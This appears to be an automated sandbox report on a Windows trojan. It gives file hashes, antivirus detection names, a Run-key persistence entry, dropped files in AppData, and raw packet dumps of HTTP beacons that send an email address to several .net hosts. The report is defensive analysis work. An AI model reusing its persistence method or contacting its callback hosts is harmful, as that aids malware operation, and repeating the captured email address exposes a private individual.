Analysis Date2015-01-08 16:38:35

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 0c78c772b256ba90da4d4c5b710dbf4a sha1: 60ec23ea69b1002e5ac1490ed9721bbba4ef8e42 size: 295936
Section.rdata md5: 5de8123eefa46dbacc5d9dd999c53985 sha1: 8bd23bf667f7e165072656af737cfc22f9b4723c size: 35328 md5: b069f64e175e2c386aa0b9440102f961 sha1: c37f8a92585c635154286b67c14069be2203553d size: 100864
Timestamp2014-07-24 05:01:40
PackerMicrosoft Visual C++ ?.?
AV360 Safeno_virus
AVAlwil (avast)Downloader-TLD [Trj]
AVArcabit (arcavir)Gen:Variant.Symmi.22722
AVAvira (antivir)BDS/Zegost.Gen4
AVCA (E-Trust Ino)no_virus
AVCAT (quickheal)Trojan.Dynamer.AC3
AVDr. Webno_virus
AVEset (nod32)Win32/Agent.VNC
AVFrisk (f-prot)no_virus
AVGrisoft (avg)Win32/Cryptor
AVK7Unwanted-Program ( 004a8e8a1 )
AVMicrosoft Security EssentialsTrojan:Win32/Dynamer!ac
AVMicroWorld (escan)Gen:Variant.Symmi.22722
AVTrend Microno_virus
AVVirusBlokAda (vba32)no_virus

Runtime Details:


↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Detection Resource Visual Logs Config Card Color ➝
C:\Documents and Settings\Administrator\Application Data\oyayzcclrafmvj\remojjf.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\oyayzcclrafmvj\remojjf.exe
Creates ProcessC:\Documents and Settings\Administrator\Application Data\oyayzcclrafmvj\remojjf.exe

↳ C:\Documents and Settings\Administrator\Application Data\oyayzcclrafmvj\remojjf.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\oyayzcclrafmvj\annaqler.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\oyayzcclrafmvj\remojjf.gjv
Creates File\Device\Afd\Endpoint
Creates ProcessWATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\oyayzcclrafmvj\remojjf.exe"

↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\oyayzcclrafmvj\remojjf.exe"

Network Details:
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Flows TCP192.168.1.1:1031 ➝
Flows TCP192.168.1.1:1032 ➝
Flows TCP192.168.1.1:1033 ➝
Flows TCP192.168.1.1:1034 ➝
Flows TCP192.168.1.1:1035 ➝
Flows TCP192.168.1.1:1036 ➝
Flows TCP192.168.1.1:1037 ➝

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d7273 6e657573 63684061   mail=mrsneusch@a
0x00000020 (00032)   6f6c2e63 6f6d266d 6574686f 643d706f
0x00000030 (00048)   73742048 5454502f 312e300d 0a416363   st HTTP/1.0..Acc
0x00000040 (00064)   6570743a 202a2f2a 0d0a436f 6e6e6563   ept: */*..Connec
0x00000050 (00080)   74696f6e 3a20636c 6f73650d 0a486f73   tion: close..Hos
0x00000060 (00096)   743a2066 616d696c 79627269 6768742e   t: familybright.
0x00000070 (00112)   6e65740d 0a0d0a                       net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d7273 6e657573 63684061   mail=mrsneusch@a
0x00000020 (00032)   6f6c2e63 6f6d266d 6574686f 643d706f
0x00000030 (00048)   73742048 5454502f 312e300d 0a416363   st HTTP/1.0..Acc
0x00000040 (00064)   6570743a 202a2f2a 0d0a436f 6e6e6563   ept: */*..Connec
0x00000050 (00080)   74696f6e 3a20636c 6f73650d 0a486f73   tion: close..Hos
0x00000060 (00096)   743a206d 61636869 6e657065 6f706c65   t: machinepeople
0x00000070 (00112)   2e6e6574 0d0a0d0a                     .net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d7273 6e657573 63684061   mail=mrsneusch@a
0x00000020 (00032)   6f6c2e63 6f6d266d 6574686f 643d706f
0x00000030 (00048)   73742048 5454502f 312e300d 0a416363   st HTTP/1.0..Acc
0x00000040 (00064)   6570743a 202a2f2a 0d0a436f 6e6e6563   ept: */*..Connec
0x00000050 (00080)   74696f6e 3a20636c 6f73650d 0a486f73   tion: close..Hos
0x00000060 (00096)   743a2072 69676874 70656f70 6c652e6e   t: rightpeople.n
0x00000070 (00112)   65740d0a 0d0a0d0a                     et......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d7273 6e657573 63684061   mail=mrsneusch@a
0x00000020 (00032)   6f6c2e63 6f6d266d 6574686f 643d706f
0x00000030 (00048)   73742048 5454502f 312e300d 0a416363   st HTTP/1.0..Acc
0x00000040 (00064)   6570743a 202a2f2a 0d0a436f 6e6e6563   ept: */*..Connec
0x00000050 (00080)   74696f6e 3a20636c 6f73650d 0a486f73   tion: close..Hos
0x00000060 (00096)   743a2070 69637475 72657065 6f706c65   t: picturepeople
0x00000070 (00112)   2e6e6574 0d0a0d0a                     .net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d7273 6e657573 63684061   mail=mrsneusch@a
0x00000020 (00032)   6f6c2e63 6f6d266d 6574686f 643d706f
0x00000030 (00048)   73742048 5454502f 312e300d 0a416363   st HTTP/1.0..Acc
0x00000040 (00064)   6570743a 202a2f2a 0d0a436f 6e6e6563   ept: */*..Connec
0x00000050 (00080)   74696f6e 3a20636c 6f73650d 0a486f73   tion: close..Hos
0x00000060 (00096)   743a2066 616d696c 7962726f 776e2e6e   t: familybrown.n
0x00000070 (00112)   65740d0a 0d0a0d0a                     et......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d7273 6e657573 63684061   mail=mrsneusch@a
0x00000020 (00032)   6f6c2e63 6f6d266d 6574686f 643d706f
0x00000030 (00048)   73742048 5454502f 312e300d 0a416363   st HTTP/1.0..Acc
0x00000040 (00064)   6570743a 202a2f2a 0d0a436f 6e6e6563   ept: */*..Connec
0x00000050 (00080)   74696f6e 3a20636c 6f73650d 0a486f73   tion: close..Hos
0x00000060 (00096)   743a2066 616d696c 7970656f 706c652e   t: familypeople.
0x00000070 (00112)   6e65740d 0a0d0a0a                     net.....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d7273 6e657573 63684061   mail=mrsneusch@a
0x00000020 (00032)   6f6c2e63 6f6d266d 6574686f 643d706f
0x00000030 (00048)   73742048 5454502f 312e300d 0a416363   st HTTP/1.0..Acc
0x00000040 (00064)   6570743a 202a2f2a 0d0a436f 6e6e6563   ept: */*..Connec
0x00000050 (00080)   74696f6e 3a20636c 6f73650d 0a486f73   tion: close..Hos
0x00000060 (00096)   743a2065 6e676c69 73687265 6164792e   t: englishready.
0x00000070 (00112)   6e65740d 0a0d0a0a                     net.....

00-+ CC
         (((((                  H
         h((((                  H
An application has made an attempt to load the C runtime library incorrectly.
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
bad allocation
bad exception
 Base Class Array'
 Class Hierarchy Descriptor'
 Complete Object Locator'
`copy constructor closure'
- CRT not initialized
dddd, MMMM dd, yyyy
`default constructor closure'
DOMAIN error
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vector constructor iterator'
`eh vector copy constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`eh vector vbase copy constructor iterator'
- floating point support not loaded
invalid string position
j@j ^V
`local static guard'
`local static thread guard'
`local vftable'
`local vftable constructor closure'
`managed vector constructor iterator'
`managed vector copy constructor iterator'
`managed vector destructor iterator'
Microsoft Visual C++ Runtime Library
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
`omni callsig'
`placement delete closure'
`placement delete[] closure'
Please contact the application's support team for more information.
<program name unknown>
- pure virtual function call
runtime error 
Runtime Error!
`scalar deleting destructor'
SING error
string too long
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
TLOSS error
 Type Descriptor'
`udt returning'
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
Unknown exception
`vbase destructor'
`vector constructor iterator'
`vector copy constructor iterator'
`vector deleting destructor'
`vector destructor iterator'
`vector vbase constructor iterator'
`vector vbase copy constructor iterator'
`virtual displacement map'
 xg`	LG
